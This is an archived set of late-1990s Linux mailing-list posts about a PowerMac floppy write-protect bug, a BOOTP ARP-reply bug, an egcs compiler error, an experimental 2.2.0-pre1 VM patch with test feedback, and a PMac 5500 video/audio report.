From: Brad Midgley @ 1998-11-16  1:27 UTC (permalink / raw)
  To: linuxppc-dev


is this a known bug?

on intel linux, if you try to mount a write-protected floppy disk
read-write, the mount succeeds but is demoted to read-only. 

the current pmac kernel will mount the disk read-write and will allow
"writes" to the disk. the writes even appear to succeed and the mounted
filesystem returns really strange results when you look at it (it's
caching the "writes" and everything seems normal until uncached data has
to be loaded from the disk!)

is it known how to query the drive for the write-protect status? does this
problem affect any other removable media?

brad


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* [BUG] arp replies with BOOTP (nfsroot)
@ 1998-12-02 20:36 64% Oren Laadan
  1998-12-03 16:20 62% ` [BUG] arp replies with BOOTP [more info] Oren Laadan
  0 siblings, 1 reply; 200+ results
From: Oren Laadan @ 1998-12-02 20:36 UTC (permalink / raw)
  To: linux-kernel, mj

Hi,

While trying to setup nfsroot with BOOTP protocol, we discovered a 
serious bug with incorrect ARP handling. [ Kernel:  2.1.129 ]

It appears that while the kenerl is waiting for a reply to a BOOTP
request sent earlier, it mishandles ARP requests. In particular,
it replies to every "arp who-has THIS_IP" with "THIS_IP is MY_NIC_ADDR":
that is, publish its own NIC address as matching EVERY local IP.

Effectively, this means it operates as a NIC proxy (well, it doesn't
really do anything but reply to ARP requests...).
As a result, other machines in the network become confused, eventually
leading to serious networking problems.

We suspect the problems is in net/ipv4/ipconfig.c:c_bootp_route_lookup()
(hooked during initialization instead of the default route lookup
function).

Any hints ?

Oren.

__________________________________________________________________________
                         ______   ____   ___  ___  _  __                  \
MOSIX Development Group  )  )  )  )   ) (  '   )   \ /      Oren Laadan    \
 The Hebrew University  /  /  /  /   /   \    /     /   orenl@cs.huji.ac.il \
 of Jerusalem,  Israel (     (  (___(  ___) _(_  __/ \_______________________)

     http://www.mosix.cs.huji.ac.il     


-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/

^ permalink raw reply	[relevance 64%]

* [BUG] arp replies with BOOTP [more info]
  1998-12-02 20:36 64% [BUG] arp replies with BOOTP (nfsroot) Oren Laadan
@ 1998-12-03 16:20 62% ` Oren Laadan
  0 siblings, 0 replies; 200+ results
From: Oren Laadan @ 1998-12-03 16:20 UTC (permalink / raw)
  To: linux-kernel, mj, Alan Cox

Hi,

> It appears that while the kenerl is waiting for a reply to a BOOTP
> request sent earlier, it mishandles ARP requests. In particular,
> it replies to every "arp who-has THIS_IP" with "THIS_IP is MY_NIC_ADDR":
> that is, publish its own NIC address as matching EVERY local IP.

A quick test showed that this problem does not occur on 2.0.X kernels.
I'm not sure where exactly within 2.1.X history it appeared.

Also - a temporary, ugly and rude hack, but most importantly - that
works for me. At least until there an "official" patch. It works by
checking within arp_rcv() if the interface is even configured to some
IP, and if not - just drop the packet. So here's a hack to the file
/net/ipv4/arp.c:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*** /net/ipv4/arp.c	Thu Dec  3 18:12:56 1998
--- /net/ipv4/arp.c	Thu Dec  3 18:14:26 1998
***************
*** 550,555 ****
--- 550,567 ----
  	    arp->ar_pln != 4)
  		goto out;
  
+ #if 1
+ 	/* XXX  rude hack to prevent ARP replies during BOOTP */
+ 	{
+ 		struct in_ifaddr *ifa = in_dev->ifa_list;
+ 		for ( ; ifa; ifa = ifa->ifa_next)
+ 			if (ifa->ifa_local || ifa->ifa_address)
+ 				break;
+ 		if (!ifa)
+ 			goto out;
+ 	}
+ #endif
+ 
  	switch (dev_type) {
  	default:	
  		if (arp->ar_pro != __constant_htons(ETH_P_IP))
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

I am not sure, though, whether maybe I should put this piece of code
actually in icmp_rcv(), which is logically correct, however - I wasn't
sure if there were any other *bad* side effects.

I welcome all comments :-)

Oren.
__________________________________________________________________________
                         ______   ____   ___  ___  _  __                  \
MOSIX Development Group  )  )  )  )   ) (  '   )   \ /      Oren Laadan    \
 The Hebrew University  /  /  /  /   /   \    /     /   orenl@cs.huji.ac.il \
 of Jerusalem,  Israel (     (  (___(  ___) _(_  __/ \_______________________)

     http://www.mosix.cs.huji.ac.il     



-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/

^ permalink raw reply	[relevance 62%]

* egcs bug  - who can I send it to ?
@ 1998-12-27 13:01 64% Jens Ch. Restemeier
  1998-12-27 17:59 64% ` Hollis R Blanchard
  1998-12-27 19:13 64% ` David Edelsohn
  0 siblings, 2 replies; 200+ results
From: Jens Ch. Restemeier @ 1998-12-27 13:01 UTC (permalink / raw)
  To: linuxppc-dev


Hi !

I've got a problem compiling the latest snapshot of crystal space on
Linux/PPC. The same archive compiles on my 486 (after some small fixes).

The RPMS I installed didn't have a "mail me for bugs" address.

Is this a known bug ?

util/gfx/gifimage.cpp: In method `ImageGifFile::ImageGifFile(UByte *,
long int)':
util/gfx/gifimage.cpp:383: internal error--unrecognizable insn:
(insn 3958 3955 54 (set (mem:SI (plus:SI (reg:SI 18 r18)
                (const_int 65536)))
        (reg:SI 19 r19)) -1 (insn_list 3621 (insn_list 3955 (nil)))
    (nil))
toplev.c:1360: Internal compiler error in function fatal_insn
make[1]: *** [out/LINUX/X11_o/util/gfx/gifimage.o] Error 1
make: *** [cs] Error 2

Jens

[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: egcs bug  - who can I send it to ?
  1998-12-27 13:01 64% egcs bug - who can I send it to ? Jens Ch. Restemeier
@ 1998-12-27 17:59 64% ` Hollis R Blanchard
  1998-12-28  4:07 64%   ` David Edelsohn
  1998-12-27 19:13 64% ` David Edelsohn
  1 sibling, 1 reply; 200+ results
From: Hollis R Blanchard @ 1998-12-27 17:59 UTC (permalink / raw)
  To: Jens Ch. Restemeier; +Cc: linuxppc-dev


On Sun, 27 Dec 1998, Jens Ch. Restemeier wrote:
> 
> I've got a problem compiling the latest snapshot of crystal space on
> Linux/PPC. The same archive compiles on my 486 (after some small fixes).
> 
> The RPMS I installed didn't have a "mail me for bugs" address.
> 
> Is this a known bug ?
> 
> util/gfx/gifimage.cpp: In method `ImageGifFile::ImageGifFile(UByte *,
> long int)':
> util/gfx/gifimage.cpp:383: internal error--unrecognizable insn:
> (insn 3958 3955 54 (set (mem:SI (plus:SI (reg:SI 18 r18)
>                 (const_int 65536)))
>         (reg:SI 19 r19)) -1 (insn_list 3621 (insn_list 3955 (nil)))
>     (nil))
> toplev.c:1360: Internal compiler error in function fatal_insn
> make[1]: *** [out/LINUX/X11_o/util/gfx/gifimage.o] Error 1
> make: *** [cs] Error 2

I think "internal compiler errors" are usually due to an optimization setting
that's to high. Look for a -O switch in your Makefile, and set it to 2 or
below (-O2, -O1, or -O0).

-Hollis


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: egcs bug - who can I send it to ?
  1998-12-27 13:01 64% egcs bug - who can I send it to ? Jens Ch. Restemeier
  1998-12-27 17:59 64% ` Hollis R Blanchard
@ 1998-12-27 19:13 64% ` David Edelsohn
  1998-12-27 20:29 64%   ` Jens Ch. Restemeier
  1 sibling, 1 reply; 200+ results
From: David Edelsohn @ 1998-12-27 19:13 UTC (permalink / raw)
  To: jenschrr; +Cc: linuxppc-dev


	Which release of EGCS are you running?  You do not provide any
information about the compiler, but I suspect that this is fixed in
egcs-1.1.1. 

David

[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: egcs bug - who can I send it to ?
  1998-12-27 19:13 64% ` David Edelsohn
@ 1998-12-27 20:29 64%   ` Jens Ch. Restemeier
  1998-12-28  4:19 64%     ` David Edelsohn
  0 siblings, 1 reply; 200+ results
From: Jens Ch. Restemeier @ 1998-12-27 20:29 UTC (permalink / raw)
  To: David Edelsohn; +Cc: linuxppc-dev


David Edelsohn wrote:
> 
>         Which release of EGCS are you running?  You do not provide any
> information about the compiler, but I suspect that this is fixed in
> egcs-1.1.1.

Whoops, it's egcs-2.91.57. Does this help ?

Jens

[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: egcs bug - who can I send it to ?
  1998-12-27 17:59 64% ` Hollis R Blanchard
@ 1998-12-28  4:07 64%   ` David Edelsohn
  0 siblings, 0 replies; 200+ results
From: David Edelsohn @ 1998-12-28  4:07 UTC (permalink / raw)
  To: Hollis R Blanchard; +Cc: Jens Ch. Restemeier, linuxppc-dev


>>>>> Hollis R Blanchard writes:

Hollis> I think "internal compiler errors" are usually due to an optimization setting
Hollis> that's to high. Look for a -O switch in your Makefile, and set it to 2 or
Hollis> below (-O2, -O1, or -O0).

	Sorry, this is incorrect.  These errors may only OCCUR when
optimizing, but it is not DUE to optimizing.  EGCS ignores any
optimization levels higher than -O3.  EGCS is not pgcc, so please do not
try to apply pgcc/Linux on Intel knowledge.

David

[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: egcs bug - who can I send it to ?
  1998-12-27 20:29 64%   ` Jens Ch. Restemeier
@ 1998-12-28  4:19 64%     ` David Edelsohn
  0 siblings, 0 replies; 200+ results
From: David Edelsohn @ 1998-12-28  4:19 UTC (permalink / raw)
  To: jenschrr; +Cc: linuxppc-dev


>>>>> "Jens Ch Restemeier" writes:

Jens> Whoops, it's egcs-2.91.57. Does this help ?

	I believe that egcs-1.1.1 reports itself as egcs-2.91.60:

		gcc version egcs-2.91.60 19981201 (egcs-1.1.1 release)

There was a PowerPC address generation bug which was fixed just before
egcs-1.1.1 was released and it might address your problem.  There is no
way for me to advise about developer interim snapshots.

David

[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: 2.2.0 Bug summary
       [not found]     <199812290146.BAA12687@terrorserver.swansea.linux.org.uk>
@ 1998-12-31 18:00 35% ` Andrea Arcangeli
  1998-12-31 18:34 64%   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Andrea Arcangeli
  0 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1998-12-31 18:00 UTC (permalink / raw)
  To: Alan Cox
  Cc: linux-kernel, Linus Torvalds, Stephen C. Tweedie,
	Benjamin Redelings I, Rik van Riel, linux-mm

On Tue, 29 Dec 1998, Alan Cox wrote:

> o	Linus VM is still 20% slower than sct vm on an 8Mb machine
> 	[benchmarks kernel build and netscape]

Today I start playing with Linus's vm in 2.2.0-pre1 and I changed the
semantics of many things and I added heuristic to avoid that one process
trashing memory will hang other "normal" processes. This my new VM I
developed today is _far_ better than sct's ac11 vm and anything I tried
before. I would like if somebody could try it also on low memory machines
and feedback what happens there.  I don't have enough spare time to test
it on many kind of hardware too. 

The same benchmark that was taking 106 sec on clean 2.2.0-pre1 to
dirtifying 160Mbyte of virtual memory (run with 128RAM and 72swap of phis
mem), now runs in 90 sec but this is not the most important thing, the
good point is that the cache/buffer/swap levels now are perfectly stable
and all other processes runs fine and get not out of cache even if there's
a memory trahser running at the same time.

Comments?

Ah, the shrink_mmap limit was wrong since we account only not referenced
pages.

Patch against 2.2.0-pre1:

Index: linux/mm/filemap.c
diff -u linux/mm/filemap.c:1.1.1.7 linux/mm/filemap.c:1.1.1.1.2.29
--- linux/mm/filemap.c:1.1.1.7	Wed Dec 23 15:25:21 1998
+++ linux/mm/filemap.c	Thu Dec 31 17:56:27 1998
@@ -125,7 +129,7 @@
 	struct page * page;
 	int count;
 
-	count = (limit<<1) >> (priority);
+	count = limit >> priority;
 
 	page = mem_map + clock;
 	do {
@@ -182,6 +186,7 @@
 	return 0;
 }
 
+#if 0
 /*
  * This is called from try_to_swap_out() when we try to get rid of some
  * pages..  If we're unmapping the last occurrence of this page, we also
@@ -201,6 +206,7 @@
 	remove_inode_page(page);
 	return 1;
 }
+#endif
 
 /*
  * Update a page cache copy, when we're doing a "write()" system call
Index: linux/mm/page_alloc.c
diff -u linux/mm/page_alloc.c:1.1.1.3 linux/mm/page_alloc.c:1.1.1.1.2.11
--- linux/mm/page_alloc.c:1.1.1.3	Sun Dec 20 16:31:11 1998
+++ linux/mm/page_alloc.c	Thu Dec 31 17:56:27 1998
@@ -241,7 +241,29 @@
 			goto nopage;
 		}
 
-		if (freepages.min > nr_free_pages) {
+		if (freepages.high < nr_free_pages)
+		{
+			if (current->trashing_memory)
+			{
+				current->trashing_memory = 0;
+#if 0
+				printk("trashing end for %s\n", current->comm);
+#endif
+			}
+		} else if (freepages.min > nr_free_pages) {
+			if (!current->trashing_memory)
+			{
+				current->trashing_memory = 1;
+#if 0
+				printk("trashing start for %s\n", current->comm);
+#endif
+			}
+		}
+
+		/*
+		 * Block the process that is trashing memory. -arca
+		 */
+		if (current->trashing_memory) {
 			int freed;
 			freed = try_to_free_pages(gfp_mask, SWAP_CLUSTER_MAX);
 			/*
Index: linux/mm/swap_state.c
diff -u linux/mm/swap_state.c:1.1.1.3 linux/mm/swap_state.c:1.1.1.1.2.8
--- linux/mm/swap_state.c:1.1.1.3	Sun Dec 20 16:31:12 1998
+++ linux/mm/swap_state.c	Tue Dec 22 18:42:03 1998
@@ -248,7 +248,7 @@
 		delete_from_swap_cache(page);
 	}
 	
-	free_page(addr);
+	__free_page(page);
 }
 
 
@@ -261,6 +261,9 @@
 struct page * lookup_swap_cache(unsigned long entry)
 {
 	struct page *found;
+#ifdef	SWAP_CACHE_INFO
+	swap_cache_find_total++;
+#endif
 	
 	while (1) {
 		found = find_page(&swapper_inode, entry);
@@ -268,8 +271,12 @@
 			return 0;
 		if (found->inode != &swapper_inode || !PageSwapCache(found))
 			goto out_bad;
-		if (!PageLocked(found))
+		if (!PageLocked(found)) {
+#ifdef	SWAP_CACHE_INFO
+			swap_cache_find_success++;
+#endif
 			return found;
+		}
 		__free_page(found);
 		__wait_on_page(found);
 	}
Index: linux/mm/vmalloc.c
diff -u linux/mm/vmalloc.c:1.1.1.2 linux/mm/vmalloc.c:1.1.1.1.2.2
--- linux/mm/vmalloc.c:1.1.1.2	Fri Nov 27 11:19:11 1998
+++ linux/mm/vmalloc.c	Fri Nov 27 11:41:42 1998
@@ -185,7 +185,8 @@
 	for (p = &vmlist ; (tmp = *p) ; p = &tmp->next) {
 		if (tmp->addr == addr) {
 			*p = tmp->next;
-			vmfree_area_pages(VMALLOC_VMADDR(tmp->addr), tmp->size);
+			vmfree_area_pages(VMALLOC_VMADDR(tmp->addr),
+					  tmp->size - PAGE_SIZE);
 			kfree(tmp);
 			return;
 		}
Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.6 linux/mm/vmscan.c:1.1.1.1.2.43
--- linux/mm/vmscan.c:1.1.1.6	Tue Dec 22 11:56:28 1998
+++ linux/mm/vmscan.c	Thu Dec 31 17:56:27 1998
@@ -162,8 +162,8 @@
 			 * copy in memory, so we add it to the swap
 			 * cache. */
 			if (PageSwapCache(page_map)) {
-				free_page(page);
-				return (atomic_read(&page_map->count) == 0);
+				__free_page(page_map);
+				return atomic_read(&page_map->count) + 1;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -180,8 +180,8 @@
 		 * asynchronously.  That's no problem, shrink_mmap() can
 		 * correctly clean up the occassional unshared page
 		 * which gets left behind in the swap cache. */
-		free_page(page);
-		return 1;	/* we slept: the process may not exist any more */
+		__free_page(page_map);
+		return atomic_read(&page_map->count) + 1;	/* we slept: the process may not exist any more */
 	}
 
 	/* The page was _not_ dirty, but still has a zero age.  It must
@@ -194,8 +194,8 @@
 		set_pte(page_table, __pte(entry));
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
-		free_page(page);
-		return (atomic_read(&page_map->count) == 0);
+		__free_page(page_map);
+		return atomic_read(&page_map->count) + 1;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,9 +210,8 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
 	__free_page(page_map);
-	return entry;
+	return atomic_read(&page_map->count) + 1;
 }
 
 /*
@@ -369,8 +368,14 @@
 	 * swapped out.  If the swap-out fails, we clear swap_cnt so the 
 	 * task won't be selected again until all others have been tried.
 	 */
-	counter = ((PAGEOUT_WEIGHT * nr_tasks) >> 10) >> priority;
+	counter = nr_tasks / (priority+1);
+	if (counter < 1)
+		counter = 1;
+	if (counter > nr_tasks)
+		counter = nr_tasks;
+
 	for (; counter >= 0; counter--) {
+		int retval;
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
@@ -382,15 +387,8 @@
 				continue;
 	 		if (p->mm->rss <= 0)
 				continue;
-			if (assign) {
-				/* 
-				 * If we didn't select a task on pass 1, 
-				 * assign each task a new swap_cnt.
-				 * Normalise the number of pages swapped
-				 * by multiplying by (RSS / 1MB)
-				 */
-				p->swap_cnt = AGE_CLUSTER_SIZE(p->mm->rss);
-			}
+			if (assign)
+				p->swap_cnt = p->mm->rss;
 			if (p->swap_cnt > max_cnt) {
 				max_cnt = p->swap_cnt;
 				pbest = p;
@@ -404,14 +402,13 @@
 			}
 			goto out;
 		}
-		pbest->swap_cnt--;
-
 		/*
 		 * Nonzero means we cleared out something, but only "1" means
 		 * that we actually free'd up a page as a result.
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
-				return 1;
+		retval = swap_out_process(pbest, gfp_mask);
+		if (retval)
+			return retval;
 	}
 out:
 	return 0;
@@ -438,44 +435,78 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	switch (swap_out(priority, gfp_mask))
+	{
+	default:
+		shrink_mmap(0, gfp_mask);
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+	case 0:
+		/* swap_out() failed to swapout */
+		if (shrink_mmap(priority, gfp_mask))
+		{
+			printk("swapout 0 shrink 1\n");
+			return 1;
+		}
+		printk("swapout 0 shrink 0\n");
+		return 0;
+	case 1:
+		/* this would be the best but should not happen right now */
+		printk(KERN_DEBUG
+		       "do_free_user_and_cache: swapout returned 1\n");
+		return 1;
+	}
+}
 
-static int kswapd_free_pages(int kswapd_state)
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 6;
+
+	kmem_cache_reap(gfp_mask);
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		default:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 2;
+		case 2:
+			shrink_dcache_memory(priority, gfp_mask);
+			*state = 0;
+		} while (--priority >= 0);
+	}
+	return 0;
+}
 
+static int kswapd_free_pages(int kswapd_state)
+{
 	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 5;
-		int count = pager_daemon.swap_cluster;
+	unsigned long end_time = jiffies + (HZ-1)/100;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				kswapd_state++;
-			case 2:
-				free_memory(swap_out(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+	do {
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
 	} while (time_before_eq(jiffies,end_time));
+	/* take kswapd_state on the stack to save some byte of memory */
 	return kswapd_state;
 }
 
+static inline void enable_swap_tick(void)
+{
+	timer_table[SWAP_TIMER].expires = jiffies+(HZ+99)/100;
+	timer_active |= 1<<SWAP_TIMER;
+}
+
 /*
  * The background pageout daemon.
  * Started as a kernel thread from the init process.
@@ -523,6 +554,7 @@
 		current->state = TASK_INTERRUPTIBLE;
 		flush_signals(current);
 		run_task_queue(&tq_disk);
+		enable_swap_tick();
 		schedule();
 		swapstats.wakeups++;
 		state = kswapd_free_pages(state);
@@ -542,35 +574,24 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
+		static int state = 0;
 
 		current->flags |= PF_MEMALLOC;
 	
-		priority = 5;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
@@ -593,7 +614,8 @@
 	if (priority) {
 		p->counter = p->priority << priority;
 		wake_up_process(p);
-	}
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -631,9 +653,8 @@
 			want_wakeup = 3;
 	
 		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
+	} else
+		enable_swap_tick();
 }
 
 /* 
Index: linux/kernel/fork.c
diff -u linux/kernel/fork.c:1.1.1.3 linux/kernel/fork.c:1.1.1.1.2.6
--- linux/kernel/fork.c:1.1.1.3	Thu Dec  3 12:55:12 1998
+++ linux/kernel/fork.c	Thu Dec 31 17:56:28 1998
@@ -567,6 +570,7 @@
 
 	/* ok, now we should be set up.. */
 	p->swappable = 1;
+	p->trashing_memory = 0;
 	p->exit_signal = clone_flags & CSIGNAL;
 	p->pdeath_signal = 0;
 
Index: linux/include/linux/sched.h
diff -u linux/include/linux/sched.h:1.1.1.2 linux/include/linux/sched.h:1.1.1.1.2.7
--- linux/include/linux/sched.h:1.1.1.2	Tue Dec 29 01:39:00 1998
+++ linux/include/linux/sched.h	Thu Dec 31 17:56:29 1998
@@ -268,6 +273,7 @@
 /* mm fault and swap info: this can arguably be seen as either mm-specific or thread-specific */
 	unsigned long min_flt, maj_flt, nswap, cmin_flt, cmaj_flt, cnswap;
 	int swappable:1;
+	int trashing_memory:1;
 	unsigned long swap_address;
 	unsigned long old_maj_flt;	/* old value of maj_flt */
 	unsigned long dec_flt;		/* page fault count of the last time */
@@ -353,7 +359,7 @@
 /* utime */	{0,0,0,0},0, \
 /* per CPU times */ {0, }, {0, }, \
 /* flt */	0,0,0,0,0,0, \
-/* swp */	0,0,0,0,0, \
+/* swp */	0,0,0,0,0,0, \
 /* process credentials */					\
 /* uid etc */	0,0,0,0,0,0,0,0,				\
 /* suppl grps*/ 0, {0,},					\





--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 35%]

* [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1998-12-31 18:00 35% ` 2.2.0 Bug summary Andrea Arcangeli
@ 1998-12-31 18:34 64%   ` Andrea Arcangeli
  1999-01-01  0:16 64%     ` Steve Bergman
  1999-01-01 16:44 51%     ` Andrea Arcangeli
  0 siblings, 2 replies; 200+ results
From: Andrea Arcangeli @ 1998-12-31 18:34 UTC (permalink / raw)
  To: Alan Cox
  Cc: linux-kernel, Linus Torvalds, Stephen C. Tweedie,
	Benjamin Redelings I, Rik van Riel, linux-mm

On Thu, 31 Dec 1998, Andrea Arcangeli wrote:

> Comments?
> 
> Ah, the shrink_mmap limit was wrong since we account only not referenced
> pages.
> 
> Patch against 2.2.0-pre1:

whoops in the last email I forget to change a bit the subject (adding
[patch]) and this printk: 

Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.1.2.43 linux/mm/vmscan.c:1.1.1.1.2.45
--- linux/mm/vmscan.c:1.1.1.1.2.43	Thu Dec 31 17:56:27 1998
+++ linux/mm/vmscan.c	Thu Dec 31 19:41:06 1998
@@ -449,11 +449,7 @@
 	case 0:
 		/* swap_out() failed to swapout */
 		if (shrink_mmap(priority, gfp_mask))
-		{
-			printk("swapout 0 shrink 1\n");
 			return 1;
-		}
-		printk("swapout 0 shrink 0\n");
 		return 0;
 	case 1:
 		/* this would be the best but should not happen right now */



Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1998-12-31 18:34 64%   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Andrea Arcangeli
@ 1999-01-01  0:16 64%     ` Steve Bergman
  1999-01-01 17:16 64%       ` Andrea Arcangeli
  1999-01-01 16:44 51%     ` Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Steve Bergman @ 1999-01-01  0:16 UTC (permalink / raw)
  To: Andrea Arcangeli; +Cc: linux-mm

Andrea Arcangeli wrote:
> 
> On Thu, 31 Dec 1998, Andrea Arcangeli wrote:
> 
> > Comments?
> >
> > Ah, the shrink_mmap limit was wrong since we account only not referenced
> > pages.
> >
> > Patch against 2.2.0-pre1:
> 
> whoops in the last email I forget to change a bit the subject (adding
> [patch]) and this printk:

Hi,

I just tried out the patch and got very disappointing results on my
128MB AMD K6-3.  I tested by loading 117 good sized images all at once. 
This kicks it ~ 165MB into the swap (~ 293 MB mem total).  The standard
2.2.0-pre1 kernel streamed out to swap at an average of >1MB/sec and
finished in 184 seconds.  WIth the patched kernel I stopped at 280 sec. 
At that time it had about 65 mb swapped out or < 250K/sec.  I then
rebooted, brought up X and an xterm and went to compile the 2.1.131-ac11
patch (still running under the patched 2.2.0-pre1) and noted that during
the compile I had 17MB in the swap with nothing else going on.  Bringing
up netscape put it up to 25MB.   Suggestions? Requests?  Let me know if
you want me to try anything else.

Thanks,
Steve
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* BUG: 2.2.0-pre2 on 5500 (and maybe 6500)
@ 1999-01-01 14:29 60% Jens Ch. Restemeier
  1999-01-01 19:44 64% ` Tom Rini
  1999-01-02  0:47 64% ` Ian K. Erickson
  0 siblings, 2 replies; 200+ results
From: Jens Ch. Restemeier @ 1999-01-01 14:29 UTC (permalink / raw)
  To: linuxppc-dev


Hi !

This bugreport applies to a PMac 5500/225, and maybe a 6500, because
they share a common motherboard.
I'm booting 2.2.0-pre2 kernel with BootX.

ftp://ftp.linuxppc.org/linuxppc/linuxppc-pre-R5/RedHat.installer/vmlinux-2.2.0-pre2

No-video problem:
First I'm booting with the "no video" box checked. I get a much too dark
picture, I can only see a few shades from the logo. I can't see the
login prompt. The last kernel I checked (2.1.127) didn't have this
problem.
Possible bug: palette not initialised.
Then I tried without the "no video" box. Now I get no video at all. This
is a problem I have since the first Kernel I've seen (2.1.24). Is there
a problem with my video-chip ? I've got an ATI chip, ATY264GT-B.

Audio problem:
You'll see in the kernel messages that there is an error during the
initialisation of AWACS. Now audio seems to be limited to 8kHz/mono.
BTW: Where has this "woop" sound gone to ? I prefer it much over a
simple beep...

I'll try test-kernels, but please reduce them of all options (network,
filesystem) that are not needed to test video/audio.

I've got the usual dmesg and a dump of the OF-tree. Anybody interested
in seeing this ? It's around 3k.

Jens

P.S.: Patch ? I'd like to, but I have not much information about the
hardware. What about starting a project to document all devices in a Mac
?
